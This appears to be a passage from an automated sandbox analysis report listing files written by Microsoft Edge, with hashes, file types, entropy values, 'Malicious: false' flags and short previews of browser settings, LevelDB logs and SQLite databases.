SHA-512:	0B9FEFC5B47F75EFB1FAD8D7F461BD059769712540EA23446375BFD6673F4D6982413658CA1F263C619557056E2F4F8CF4A1F930AEE1E4E07C91C8B76E22C4F7
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\56d9865d-f0ae-4bbd-9677-c8a6cc481b46.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17595), with no line terminators
Category:	dropped
Size (bytes):	17597
Entropy (8bit):	5.473931646889092
Encrypted:	false
SSDEEP:	384:stWPGKSu4rsMiqfhGo2sW9cLpbGM4Qwb6WoBlaTY4:scOxu0iqff89c1bGMHI0vaTY4
MD5:	0DBEC4331AB7E9810205720D7AE13C6E
SHA1:	518A96343102A7A41473D01F84339D6D01C992BE
SHA-256:	123107A493735EE760C1079AB72EFB867E1F97A286D00CDD339D01BB6D601C8F
SHA-512:	0AC5FBF41554D0F85BB9298D5C802EBE3DB12ACC599DCF0681A49F3D5B9272F5888C8D5AF2B7B8BEF99BF48523CC6EE64317341C19C622560395CC7E4EC87EF3
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6ca56d2b-9566-4f8f-b645-7f5a8ace2988.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17430), with no line terminators
Category:	dropped
Size (bytes):	17432
Entropy (8bit):	5.477383653149534
Encrypted:	false
SSDEEP:	384:stWPGKSu4rsMiqfhGo2sW9cLpbGM4Qwb6WYdaTY4:scOxu0iqff89c1bGMHIkdaTY4
MD5:	B3DC6E6AF80775BBF236E91657941FCA
SHA1:	9698CF755868163655BDFABA898843F3B1A9ED31
SHA-256:	2A3CA7819C2132FD599952F8C26B26A76F75A9D2B31D732B855117E8D762BB1D
SHA-512:	98BC152A21DD0EA8BDF6A0464DCD1ED7610AAAB265B1BF916B8421A8B049B138702066B9FEFD5A53475958DA6F0F8BD3B7CF4FE02C296770C64B0285A128A462
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8c66a7a5-507e-4ef0-82f1-1a4ac5c03ff0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8e6a919e-2340-4b6d-924e-0875d950dbc6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57698422548858
Encrypted:	false
SSDEEP:	768:bRz+P1WP4+fqt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVev2Mn8srwb7KpKtur:bRz+P1WP4+fqtu1jaXv2E8Fbjtg
MD5:	AFFA2D7DC51F98FD9D383F0A415BD0B2
SHA1:	C4F63CB77C36411D540AD2AFE963B65B10A28931
SHA-256:	2859B8557A7FE7127570A87D5E3CE9980371609361A374A67ECA2A1DB1B4715F
SHA-512:	FACD76CE181EF8330E5F26C0466D846A84B6D6B01DD59D83389B1421EEAD5405F6BB048E6AC8B187F364ED981902191EC10E6A19BE30E87993CB36D4CC923353
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375791195057337","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375791195057337","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.234810349239825
Encrypted:	false
SSDEEP:	6:HUzLFP1923oH+Tcwtp3hBtB2KLlVUzLft+q2P923oH+Tcwtp3hBWsIFUv:+p6Yebp3dFL2Mv4Yebp3eFUv
MD5:	84DCC45DC47AB264111600CE9D4B54BA
SHA1:	AB852CF04AC980270C2FA179CCCE34A8B3DEB056
SHA-256:	0A09B5D17043A75DE23DE219766C4B9D5A72CCDA86E5BEDE4783A3D08D8EDAB8
SHA-512:	DBE0F31BACFEF2EFEBE1EF97CAEE5499C14FF87A84F1F71AED2B45FA2F75E803DDCF64A84E32A06B85F5CBF4A28018279C2A2A206D8991C8047C376B77D88D18
Malicious:	false
Preview:	2024/11/11-04:33:20.976 1a68 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/11-04:33:21.302 1a68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2163821
Entropy (8bit):	5.222869622359171
Encrypted:	false
SSDEEP:	24576:v+/PN8FJfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Dfx2mjF
MD5:	37E4DD9B44FD1DA151100F4843317C29
SHA1:	8A4172B66A487F1CC24993FC759F898716C03595
SHA-256:	0177D82766CABEE90DBD76C1B2DDE58F1B562B6C33891515C03A4E74612DB9AD
SHA-512:	5755C1F7511B2AA64DF473F3D4D1C98094FAB9088A30B82A28618EB9895C3BF05324E9AFE5882C29E64BBC093CE135DFE9F92E965CF95763B7B45A1168F55D67
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.085666232180183
Encrypted:	false
SSDEEP:	6:HUzLLM+q2P923oH+Tcwt9Eh1tIFUt8YUzLGTZmw+YUzLeSMVkwO923oH+Tcwt9Er:+3M+v4Yeb9Eh16FUt8Z+/+ZiSMV5LYe8
MD5:	0FA9F27B87F7C68E715BC044C6988A6E
SHA1:	1A75B5059E233953DAF50F290E1850E99A1F21C1
SHA-256:	407653203133692C3425362856B60A23FBB8ECD180E431B5626D95DDF06EBA98
SHA-512:	9F45390F410BEAA94054392162F4346A4E6D81A1C0D902AC8CEDA0A211ADBFEDA51D1EF67FAFF5CC6B5710780563D681A1C5C7D3EA62475BFA4D328EC67283E3
Malicious:	false
Preview:	2024/11/11-04:33:21.396 236c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/11-04:33:21.404 236c Recovering log #3.2024/11/11-04:33:21.433 236c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.085666232180183
Encrypted:	false
SSDEEP:	6:HUzLLM+q2P923oH+Tcwt9Eh1tIFUt8YUzLGTZmw+YUzLeSMVkwO923oH+Tcwt9Er:+3M+v4Yeb9Eh16FUt8Z+/+ZiSMV5LYe8
MD5:	0FA9F27B87F7C68E715BC044C6988A6E
SHA1:	1A75B5059E233953DAF50F290E1850E99A1F21C1
SHA-256:	407653203133692C3425362856B60A23FBB8ECD180E431B5626D95DDF06EBA98
SHA-512:	9F45390F410BEAA94054392162F4346A4E6D81A1C0D902AC8CEDA0A211ADBFEDA51D1EF67FAFF5CC6B5710780563D681A1C5C7D3EA62475BFA4D328EC67283E3
Malicious:	false
Preview:	2024/11/11-04:33:21.396 236c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/11-04:33:21.404 236c Recovering log #3.2024/11/11-04:33:21.433 236c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4633634759339771
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuS:TouQq3qh7z3bY2LNW9WMcUvBuS
MD5:	0A51277EAAD217A724C3DAEDC697A8F0
SHA1:	3CB06CC3C31D3BB84254C6A8B6FA9566C6942C97
SHA-256:	A98A7F590D009F053CE890D840D406BF6E37D1F70E9B4D3EC7954B55197681D5
SHA-512:	B2F59BFB1833DEF7E472E048C4217CBAA9D92EEA30EBE4F4FB8A2F86B94137BCE751C2A518D21FF514D05D30BEB9A3B2E13F0A8970569DFF20123C44B3F9BE5F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.165266353187178
Encrypted:	false
SSDEEP:	6:HUzLeq2P923oH+TcwtnG2tMsIFUt8YUzLwZmw+YUzL4kwO923oH+TcwtnG2tMsLJ:+6v4Yebn9GFUt8Z8/+Z85LYebn95J
MD5:	021B1FF73FA3E2D79CB0737B04DF6242
SHA1:	8A773C569C348B74687AB7D2E6FCE6AE8663A1C4
SHA-256:	8FE8461A0D3A2CC8A5C1FDAED8E62D1B1E1AF6CDF1C4EFCB2F77D367A4B53C1E
SHA-512:	2E6383FC99AEE08FA67DA0F6FB87B3F548223CC2EC8C58C3A2DDD45F815260D04F793361B7BC1B7DE6D1C636DF869AD6B7966A00C56F37B2F1FB7C31ACF6A1FE
Malicious:	false
Preview:	2024/11/11-04:33:15.274 1ce4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/11-04:33:15.275 1ce4 Recovering log #3.2024/11/11-04:33:15.275 1ce4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.165266353187178
Encrypted:	false
SSDEEP:	6:HUzLeq2P923oH+TcwtnG2tMsIFUt8YUzLwZmw+YUzL4kwO923oH+TcwtnG2tMsLJ:+6v4Yebn9GFUt8Z8/+Z85LYebn95J
MD5:	021B1FF73FA3E2D79CB0737B04DF6242
SHA1:	8A773C569C348B74687AB7D2E6FCE6AE8663A1C4
SHA-256:	8FE8461A0D3A2CC8A5C1FDAED8E62D1B1E1AF6CDF1C4EFCB2F77D367A4B53C1E
SHA-512:	2E6383FC99AEE08FA67DA0F6FB87B3F548223CC2EC8C58C3A2DDD45F815260D04F793361B7BC1B7DE6D1C636DF869AD6B7966A00C56F37B2F1FB7C31ACF6A1FE
Malicious:	false
Preview:	2024/11/11-04:33:15.274 1ce4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/11-04:33:15.275 1ce4 Recovering log #3.2024/11/11-04:33:15.275 1ce4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6126432016115516
Encrypted:	false
SSDEEP:	12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWdcxN7mMAqL:TLapR+DDNzWjJ0npnyXKUO8+jj7mpnmL
MD5:	5CF6004F9EDB78933A876EEFF3EAAD24
SHA1:	82D3249AE5660F9B2E16B9BD50C0AB287EB746CA
SHA-256:	766BE36D9CB903F1CA00133CE473AEABC28999BF4E0A1C0D174D49E7192CCF25
SHA-512:	875DF4D3427F58A689575CA7457EE20A7769F341F3465E858660D0BDBBCD14E9BD7D5DC64E2323D3E2E56A5345B00B160BEE4452BBE745952E0090E12C945160
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354109798509107
Encrypted:	false
SSDEEP:	6144:vA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:vFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	287EC29DB532A73B7EB691F51DD7BFDE
SHA1:	17FF60353506CE9F517748E9E8BDBE8E024AB309
SHA-256:	11D44AED7FBE8BDAA06561792DD65C8008EB662199260801A7AB82E113879E82
SHA-512:	2327DD9B7CE9F13506B4CCC8F7C809EF186D7B1C4236927D41339037B77C7BDB97C82F749F712F3AFF43BA4F7F3C551C18F8CFA74F82F3B24AEAC34E78C2026B
Malicious:	false
Preview:	...m.................DB_VERSION.1.<d.q...............&QUERY_TIMESTAMP:domains_config_gz2...13375791203089617..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.1308485502243215
Encrypted:	false
SSDEEP:	6:HUzL2Eb1923oH+Tcwtk2WwnvB2KLlVUzL9Gu1yq2P923oH+Tcwtk2WwnvIFUv:+eYebkxwnvFL2pGNv4YebkxwnQFUv
MD5:	9ED596C71C1AF196452F042B3A512CFB
SHA1:	4151887683BBCE404ACD899936EF9E39C630115F
SHA-256:	E40DD145067309BB85BC39CD830907AA462F865715591FFE62DBE680F9A0442F
SHA-512:	1B329F283DA998ED9F48A3C44A2FAF4FF4A38A333718B2EC9AA99A9A3DF640C78BDE1ABD1FFCB76FFA524B08808F1E40D3760BE3059BA3AC0DCA1527C37D9761
Malicious:	false
Preview:	2024/11/11-04:33:21.454 23a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/11-04:33:21.852 23a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324614814422291
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RL:C1gAg1zfvD
